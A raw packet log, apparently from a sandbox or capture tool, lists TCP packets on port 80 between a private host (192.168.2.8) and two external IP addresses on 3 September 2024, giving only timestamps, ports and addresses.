Sep 3, 2024 17:13:20.539819002 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540008068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540019989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540030003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540035009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540076017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540095091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540162086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540173054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540183067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540194035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540204048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540215015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540225983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540237904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540237904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540237904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540273905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540273905 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540308952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540321112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540332079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540344000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540354967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540365934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540365934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540384054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540410995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540410995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540448904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540462017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540471077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540488958 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540499926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540504932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540513992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540520906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540525913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540539026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540544033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540549994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540582895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540582895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.540585995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540764093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540776014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.540941000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.541191101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.541203976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.541254997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.544550896 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544562101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544573069 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544612885 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544636011 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544707060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544718981 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544729948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544742107 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544759989 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544786930 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544850111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544862032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544872999 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544883013 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544888973 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544900894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544912100 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544924021 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544945955 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.544979095 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.544991016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545001030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545026064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545038939 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545125008 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545145035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545155048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545160055 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545196056 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545213938 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545293093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545305014 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545314074 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545324087 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545334101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545334101 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545350075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545362949 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545372963 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545373917 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545384884 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545397997 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545409918 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545433044 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545617104 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545628071 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545658112 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545773029 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545785904 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545797110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545808077 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545819044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545825005 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545830011 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.545835018 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.545866966 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.546708107 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.546870947 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.546881914 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.546892881 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.547019958 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.547032118 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.547043085 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.547056913 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.547060966 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.547080994 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.547095060 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548413992 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548458099 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548573017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548583984 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548607111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548626900 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548746109 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548757076 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548768044 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548778057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548789978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548794031 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548800945 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548814058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548821926 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548825026 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548835039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548841000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548852921 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548863888 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.548885107 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.548912048 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549051046 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549169064 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549218893 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549230099 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549240112 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549245119 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549254894 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549257994 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549280882 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549318075 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549376965 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549395084 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.549420118 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.549432993 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.550471067 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550482035 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550492048 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550525904 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.550555944 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.550631046 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550641060 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550652027 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550662994 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550667048 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.550679922 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.550699949 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.550719976 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.551317930 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551328897 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551362991 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.551439047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551450968 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551460981 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551479101 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551484108 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.551491976 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.551496029 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.551526070 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.553345919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553356886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553365946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553379059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553405046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.553425074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.553452015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553463936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553473949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553486109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.553508997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.553508997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.553538084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.553987026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554172039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554181099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554189920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554202080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554215908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554224968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.554227114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554251909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.554275036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.554279089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554291964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.554327011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555398941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555411100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555422068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555476904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555497885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555547953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555558920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555567980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555594921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555694103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555707932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555712938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555720091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555731058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555777073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555777073 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555882931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555893898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555903912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555915117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555926085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555937052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.555962086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.555962086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556020975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556035995 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556047916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556057930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556070089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556081057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556091070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556096077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556104898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556111097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556138992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556138992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556334019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556344986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556355000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556368113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556380033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556381941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556416035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556428909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556519032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556531906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556543112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556554079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556565046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556575060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556577921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556586981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556612015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556653976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556674957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556685925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556695938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556706905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556718111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556721926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556734085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556773901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556773901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556812048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556823015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556833029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.556873083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.556873083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557001114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557013035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557023048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557034969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557044983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557063103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557074070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557080030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557080030 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557101011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557125092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557142973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557154894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557166100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557172060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557182074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557193041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557204008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557234049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557234049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557246923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557291985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557305098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557315111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557326078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557339907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557351112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557362080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557375908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557375908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557394981 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557434082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557436943 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557446957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557461977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557475090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557476997 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557486057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557502031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557502031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557519913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557688951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557812929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557853937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557866096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557876110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557889938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557899952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557919025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557921886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557921886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557929993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557941914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557944059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.557954073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557981014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.557991028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558001041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558002949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558002949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558012962 CEST	80	49730	52.212.52.84	192.168.2.8
